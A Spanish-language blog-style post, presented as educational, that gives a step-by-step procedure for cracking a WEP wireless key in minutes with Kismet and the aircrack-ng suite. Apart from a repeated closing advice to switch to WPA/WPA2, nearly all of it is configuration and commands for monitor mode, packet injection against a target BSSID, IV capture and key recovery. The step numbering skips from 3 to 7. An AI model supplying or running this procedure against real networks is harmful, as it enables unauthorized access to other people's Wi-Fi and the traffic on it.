Esto es solo en plan didáctico para que aprendamos como nos pueden piratear nuestra conexión a internet en tan solo un par de minutos, para evitar eso mejor que cifremos nuestra conexión mediante los cifrados: wpa y wpa2
La seguridad en las redes inalámbricas es un tema muy serio que produce serios quebraderos de cabeza a aquellos que sienten importante la información que protegen o simplemente no quieren a medio país conectándose a través de su red a Internet. Para ello, con el tiempo, se han ido diseñando distintos sistemas de cifrado de datos para este tipo de redes.
El más popular de los mecanismos actualmente en uso es WEP (Wired Equivalent Privacy), aunque la certeza de su debilidad ha dado paso a la creación de un sistema mucho más robusto llamado WPA (Wi-Fi Protected Access). La debilidad de WEP es algo que todo el mundo conoce, aunque también se tenía en cuenta, hasta ahora, que era una tarea realmente ardua descifrar la clave. Ahora, el FBI se ha encargado de demostrar que no sólo NO ES TAN DIFICIL crackear la clave WEP, sino que se trata de un proceso sencillo, de escasos 3 minutos, que cualquiera puede realizar utilizando herramientas que se pueden adquirir gratis en Internet. Por ello, y por la importancia del asunto, he decidido traducir la narración que Humphrey Cheung, asistente a la demostración, ha realizado de este “ataque WEP”.
Esto es solo en plan didáctico para que aprendamos como nos pueden piratear nuestra conexión a internet en tan solo un par de minutos, por eso es mejor que cifremos nuestra conexión mediante los cifrados: wpa y wpa2
Una vez instalado y configurado el WIFI, tenemos que instalar la suite airckarck-ng y kismet
# apt-get install aircrack-ng
# apt-get install kismet
Debemos configurar Kismet para que funcione con bcm43xx, o con Atheros (AR5212) editaremos el archivo según nuestra tarjeta
/etc/kismet/kismet.conf
buscaremos la linea
source=none,none,none
y la dejaremos así, en este caso en un broadcom:
source=bcm43xx,eth1,broadcom
o así, dependiendo de nuestra tarjeta de red, en este caso es Atheros (AR5212):
source=madwifi_g,wifi0,madwifi-ng
Ahora que tenemos las herramientas, solo me queda aclarar unas cosas:
ESSID: Es el nombre o identificador de las redes wifi
BSSID: Es la dirección MAC de los puntos de acceso o routers inalámbricos
¿Cuantos paquetes necesito capturar?: Depende de la longitud de la clave WEP
<= 128 bits recomendables al menos 300.000 >= 128 bits a partir de 1.000.000
¿Donde veo los paquetes que llevo capturados?:
En la consola que esta airodump-ng ejecutándose en la columna # Data
OK, comencemos:
1-Paramos la tarjeta
# ifconfig eth1 down
2 -Establecemos a 1 M/s el ancho de banda, para tener muy buena visión y mucha distancia de alcance.
# iwconfig eth1 rate 1M
3- Ponemos la tarjeta en modo monitor
# airmon-ng eth1 start
7- Hacemos un escaneo de redes en modo monitor y obtenemos ESSID, BSSID y el canal de la red que estamos probando, y terminamos de preparar la tarjeta.
# kismet
8- Ahora abriremos dos consolas una para aireplay-ng y otra para airodump-ng
9- Comenzamos a inyectar paquetes
# aireplay-ng -CANAL -b BSSID -h DIRECCION-MAC-DE-bcm43xx eth1
10- Comenzamos a capturar paquetes IVs
# airodump-ng --ivs -c CANAL -w ESSID eth1
Una vez que tengamos la cantidad de paquetes deseados paramos aireplay-ng y airodump-ng y seguimos con el ultimo paso.
11- Obtenemos la clave
# aircrack-ng ESSID-01.ivs
Este proceso no debería llevar mas de 1 ó 2 minutos. En caso de que no saque la contraseña sera necesario capturar mas paquetes
Esto es solo en plan didáctico para que aprendamos como nos pueden piratear nuestra conexión a internet en tan solo un par de minutos, por eso es mejor que cifremos nuestra conexión mediante los cifrados: wpa y wpa2
.